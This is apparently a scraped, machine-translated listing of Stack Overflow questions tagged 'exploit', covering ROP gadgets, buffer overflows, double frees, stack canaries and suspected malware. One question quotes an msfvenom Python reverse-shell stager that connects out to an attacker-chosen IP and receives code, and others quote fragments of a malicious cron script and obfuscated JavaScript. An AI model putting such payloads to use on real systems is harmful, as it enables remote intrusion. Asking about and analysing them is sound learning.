exploit

    -3熱度

    1回答

    計算機安全是一個我很長時間避免的大問題,假設它對我的技能水平來說太複雜了。 我開始有點好奇,所以我想知道,是否可以在彙編IDE中打開隨機的exe文件(或任何文件),並開始改變它? 我的意思是,這將是肯定很難理解頁面和組裝的頁面,但如果有人/ CAN /,取之於編輯文件,並在一堆指令惡補阻止他們? 假設你能做到這一點,我不知道怎樣才能機器代碼量以root訪問權限?你是否必須從字面上打開操作系統並重新

    1熱度

    1回答

    ROP中的直接小工具是什麼 - 返回面向編程中的安全漏洞利用技術? 我讀一些理論有關的ROPs,近期小工具只能寫的,我們有一個指針代碼序列: pop %ebx ; ret 指令 pop %ebx 將在未來的DWORD加載到%EBX。 但我不明白它爲什麼會有用?如果你正在從某個庫中加載某些東西,那麼你試圖獲得一些有用的小工具,爲什麼會有「立即」?

    1熱度

    1回答

    ROP中的NOP小工具是什麼 - 返回面向編程中的安全漏洞利用技術?我正在閱讀關於ROP的一些理論,並且只寫了它是指向操作碼C3 ret的指針? NOP表示處理器沒有操作,當指令指針到達時,處理器實際上什麼都不做,但是一個時鐘週期到期。

    2熱度

    1回答

    我正在尋找一些幫助環繞下我的頭: #include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> int main(int argc, char **argv) {char buffer[70]; gets(buffer);} 我知道這很容易受到緩衝區溢出。它需要92個「A」,然後接下來

    3熱度

    2回答

    我在我的服務器上遇到高達1 Gbps的尖峯,一直在尋找病毒和惡意軟件。我在/etc/cron.hourly中發現了這個文件:gcc.sh,並想知道是否有人看到過類似的東西,並且會對代碼有所瞭解。謝謝! #!/bin/sh PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/binfor i in

    -3熱度

    1回答

    var a = ['document', 'window', String]; var b = '108 111 99 97 116 105 111 110'; var c = '%68%74%74%70%73%3a%2f%2f%77%77%77%2e%74%75%6d%62%6c%72%2e%63%6f%6d'; var d = 'ZnJvbUNoYXJDb2Rl'; var e = '

    1熱度

    1回答

    在Linux中,除了金絲雀之外,繞過安全機制(如NX,ASLR)的方法很多。實際上,我發現stackary canary是由/arch/arm/include/asm/stackprotector.h/boot_init_stack_canary()函數中的Linux內核生成的。隨機數最終由extract_entropy函數生成,並且與環境噪聲有關如鍵盤,中斷的時間間隔。 當利用堆棧溢出漏洞時,是

    -2熱度

    1回答

    有人可以解釋爲什麼釋放連續兩次導致崩潰,但釋放第一,然後b,然後再次不會崩潰? 我知道free會將堆塊插入雙鏈接空閒列表中。釋放兩次會在空閒列表中兩次插入相同的塊。但爲什麼會發生崩潰? int *a = malloc(8); int *b = malloc(8); free(a); // free(a); //Would crash! free(b); free(a); //No

    0熱度

    1回答

    我已經使用msfvenom創建以下蟒蛇有效載荷: import socket,struct s=socket.socket(2,socket.SOCK_STREAM) s.connect(('MY PUBLIC IP',3930)) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(l) while len(d)<l: d+=s.recv(

    0熱度

    2回答

    在過去的一段時間裏,我一直在修補Web服務器漏洞,並且我在Python中佔據了一部分。我用python編寫了一個格式不正確的http POST數據,當我將它粘貼到Http Live Headers中並重播請求時,它在100次中運行100次。 問題是,當我嘗試刪除Replay標頭部分,只使用python來完成整個事情,python似乎並沒有發送完整的POST命令。 我使用這個: send = soc